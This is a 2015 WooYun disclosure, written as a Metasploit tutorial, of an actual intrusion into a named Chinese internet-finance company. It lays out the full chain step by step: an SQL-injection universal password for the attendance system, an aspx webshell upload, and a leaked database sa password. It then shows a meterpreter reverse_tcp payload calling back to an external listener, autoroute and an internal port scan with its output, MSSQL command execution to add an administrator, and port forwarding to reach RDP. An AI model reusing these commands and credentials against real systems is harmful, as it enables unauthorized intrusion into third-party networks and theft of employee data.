当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140386

漏洞标题:互联网金融之融通汇信某站点SQL注入导致内网漫游(metasploit基础教程篇二)

相关厂商:rthxchina.com

漏洞作者: 默之

提交时间:2015-09-11 07:01

修复时间:2015-10-26 07:02

公开时间:2015-10-26 07:02

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某个软件的通用漏洞
简单介绍下融通汇信:
<code>2012年7月 经北京工商局注册成立
2012年8月 与证大财富签约合作
2013年3月 国家金融界有关领导莅临公司考察工作,对融通汇信的快速发展给予高度赞扬
2013年5月 在人民大会堂荣获“中国微金融服务最佳诚信品牌”奖
2013年6月 与上海资信建立战略合作关系
2013年8月 千人相聚,共同举杯欢庆公司一周岁生日
2013年10月 出席2013中国小额信贷联盟年会,并当选P2P委员会执行委员
2014年1月 融通汇信志愿者“关爱母亲河”活动广受媒体关注
2014年1月 强势入席CIFC互联网金融联盟
2014年1月 阿朋贷正式上线,公司全面进军互联网金融
2014年5月 与简单理财网签约合作
2014年6月 与挖财网签约合作[1] </code>
发展还是挺迅速的,废话不多说,开始了

详细说明:

网址:http://kq.rthxchina.com:7070/Login.aspx
#1 SQL注入
采用的是永益web考勤管理系统,这个系统有漏洞,参见

某考勤系统通用SQL注入漏洞(可添加服务器管理员账号) 
http://wooyun.org/bugs/wooyun-2015-0139822


万能密码admin'or'1'='1/密码任意六位字母 登录进入系统

截图20150911001834.png


登陆成功界面.png


可以看到数千的员工信息4000+

员工.png


从这个系统就可以修改员工的签到信息了,将老板设置为签到,这样老板每天都会迟到了
还有员工的邮箱,这不是今天的重点,所以就不拿去做爆破了
#2 Getshell
依然是这个系统,在请假单管理里面找到申请请假的员工,然后点击编辑,这里就会出现一个上传页面,这个页面允许任意文件上传,因此直接添加aspx大马就行了,然后就获取到路径,登录即可

上传.png


大马.png


之后找到了网站的配置文件,发现了mssql数据库名称用户和密码

<add key="aspnet:MaxHttpCollectionKeys" value="5000" />
    <add key="title" value="永益WEB考勤管理系统" />
    <add key="MSSql" value="Persist Security Info=True;server=.;database=YEKQV3; uid=sa;pwd=123.abc;Pooling=true;Max Pool Size=100;Min Pool Size=1;" />


这个是这次的重点,看似简单的密码,打开了内网的大门

内网.png


漏洞证明:

#3 内网漫游开始
使用工具就是今天的主角metasploit
好了先生成我们的payload的吧

msfpayload windows/meterpreter/reverse_tcp LHOST=*.*.*.*(外网地址) LPORT=5566 x>/root/Desktop/setup.exe


关于端口映射的内容,可以从网上搜一下,很多教学,这里就不做演示了
之后将我们生成的setup.exe文件上传到目标站点
之后打开metasploit,

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.102
set lport 5566
run


好了,之后在大马的cmdshell中执行我们上传的文件

执行文件.png


然后就会生成一个meterpreter(思维没跟上,忘记截图了,暂时用其他步骤的一张)

添加route.png


这个系统是win2008,使用metasploit自带提权没有成功
然后输入shell,进入类似cmd的界面,查看ip,当然也可以直接在meterpreter中输入ipconfig进行查询,这里就可以执行好多命令了,如果是system权限就可以添加管理员账号了,但是没有提权成功

ipconfig.png


之后exit,退出shell界面,回到meterpreter,要使用他进行内网的端口扫描需要添加路由信息

run autoroute -s 192.168.43.90


路由.png


接下来就要用到辅助模块了也就是auxiliary里面的模块

use auxiliary/scanner/portscan/tcp
set ports 80,8080,1433
set rhosts 192.168.43.90/24
run


[*] 192.168.43.2:80 - TCP OPEN
[*] 192.168.43.10:80 - TCP OPEN
[*] 192.168.43.10:8080 - TCP OPEN
[*] 192.168.43.28:80 - TCP OPEN
[*] Scanned  26 of 256 hosts (10% complete)
[*] 192.168.43.30:80 - TCP OPEN
[*] 192.168.43.51:8080 - TCP OPEN
[*] 192.168.43.51:80 - TCP OPEN
[*] Scanned  54 of 256 hosts (21% complete)
[*] 192.168.43.71:80 - TCP OPEN
[*] 192.168.43.71:1433 - TCP OPEN
[*] 192.168.43.70:80 - TCP OPEN
[*] Scanned  77 of 256 hosts (30% complete)
[*] 192.168.43.79:80 - TCP OPEN
[*] 192.168.43.90:1433 - TCP OPEN
[*] 192.168.43.90:80 - TCP OPEN
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.43.120:80 - TCP OPEN
[*] 192.168.43.121:80 - TCP OPEN
[*] 192.168.43.130:80 - TCP OPEN
[*] Scanned 129 of 256 hosts (50% complete)
[*] 192.168.43.132:80 - TCP OPEN
[*] 192.168.43.131:80 - TCP OPEN
[*] 192.168.43.136:80 - TCP OPEN
[*] 192.168.43.138:8080 - TCP OPEN
[*] 192.168.43.138:80 - TCP OPEN
[*] 192.168.43.140:80 - TCP OPEN
[*] 192.168.43.148:80 - TCP OPEN
[*] 192.168.43.146:80 - TCP OPEN
[*] 192.168.43.145:80 - TCP OPEN
[*] 192.168.43.145:8080 - TCP OPEN
[*] 192.168.43.150:80 - TCP OPEN
[*] 192.168.43.151:80 - TCP OPEN
[*] 192.168.43.152:80 - TCP OPEN
[*] Scanned 154 of 256 hosts (60% complete)
[*] 192.168.43.155:80 - TCP OPEN
[*] 192.168.43.155:8080 - TCP OPEN
[*] 192.168.43.180:80 - TCP OPEN
[*] 192.168.43.181:80 - TCP OPEN
[*] Scanned 181 of 256 hosts (70% complete)
[*] 192.168.43.200:80 - TCP OPEN
[*] 192.168.43.200:8080 - TCP OPEN
[*] 192.168.43.203:8080 - TCP OPEN
[*] 192.168.43.203:80 - TCP OPEN
[*] 192.168.43.202:80 - TCP OPEN
[*] Scanned 205 of 256 hosts (80% complete)
[*] 192.168.43.213:8080 - TCP OPEN
[*] 192.168.43.214:8080 - TCP OPEN
[*] Scanned 231 of 256 hosts (90% complete)
[*] 192.168.43.238:8080 - TCP OPEN
[*] 192.168.43.240:80 - TCP OPEN
[*] 192.168.43.243:80 - TCP OPEN
[*] 192.168.43.243:8080 - TCP OPEN
[*] Scanned 256 of 256 hosts (100% complete)


可以看见出了本机外还有一台机器开了1433端口
使用mssql_login模块猜解密码

use auxiliary/scanner/mssql/mssql_login
之后show options将所需要填写的加上


mssql登陆.png


可以看见成功了,密码和刚刚那个一样123.abc
然后就可以使用下面的执行系统命令了

use auxiliary/admin/mssql/mssql_exec


很好system权限

执行命令2.png


执行命令.png


可以看到管理员账号确实添加上了,中间有一点小插曲,就是设置密码的时候,老是没有成功,返回是乱码,刚开始觉着不太可能,因为是system权限,后来将密码设置复杂的就可以了

Debian 7 64 位-2015-09-08-23-21-27.png


现在想这是有了账号密码,试着使用smb登陆,但是445端口没有开放,然后就想着使用mssql的payload模块生成一个meterpreter也行,然后就执行

use exploit/windows/mssql/mssql_payload
set rhost 192.168.43.71
set password 123.abc
exploit


端口转发.png


最后竟然什么也没有生成,想问一下大牛这是怎么回事,望告知,实在没办法了想起了还可以端口转发的。。。(脑袋短路了)
然后session -i 1回到原来的meterpreter中,执行

portfwd add -l 4321 -p 3389 -r 192,168.43.71


在新打开的终端里输入

rdesktop 127.0.0.1:4321


使用刚才的账号和密码登陆就可以了

Debian 7 64 位-2015-09-10-22-41-18.png


试了一下192.168.43.90也可以登陆,但是没有取得密码

Debian 7 64 位-2015-09-10-23-48-03.png


这个服务器运行中融通汇信的系统办公系统

mssql远程.png


远程.png


明明开着服务,但是外网就是打不开,不知道什么原因
就到这里了,其实还可以渗透,系统有员工的登录密码,没有接着下去了

密码.png


修复方案:

1.更新考勤系统
2.消灭弱口令,也不要通用口令

版权声明:转载请注明来源 默之@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论

  1. 2015-09-11 08:43 | 进击的zjx ( 普通白帽子 | Rank:306 漏洞数:64 | 工作需要,暂别一段时间)

    一哪去了

  2. 2015-09-11 09:16 | 默之 ( 普通白帽子 | Rank:502 漏洞数:85 | 沉淀。)

    @进击的zjx http://wooyun.org/bugs/wooyun-2015-0135828

  3. 2015-10-26 08:15 | 浪子 ( 路人 | Rank:2 漏洞数:2 | ..)

    set METHOD old 试试 mssql_payload那个

  4. 2015-10-26 08:26 | 默之 ( 普通白帽子 | Rank:502 漏洞数:85 | 沉淀。)

    好,最近碰到一样的问题,我试试,谢了@浪子

  5. 2015-10-26 08:52 | 老实先生 ( 路人 | Rank:17 漏洞数:8 | 只会注不会shell)

    羡慕会使用metasploit的人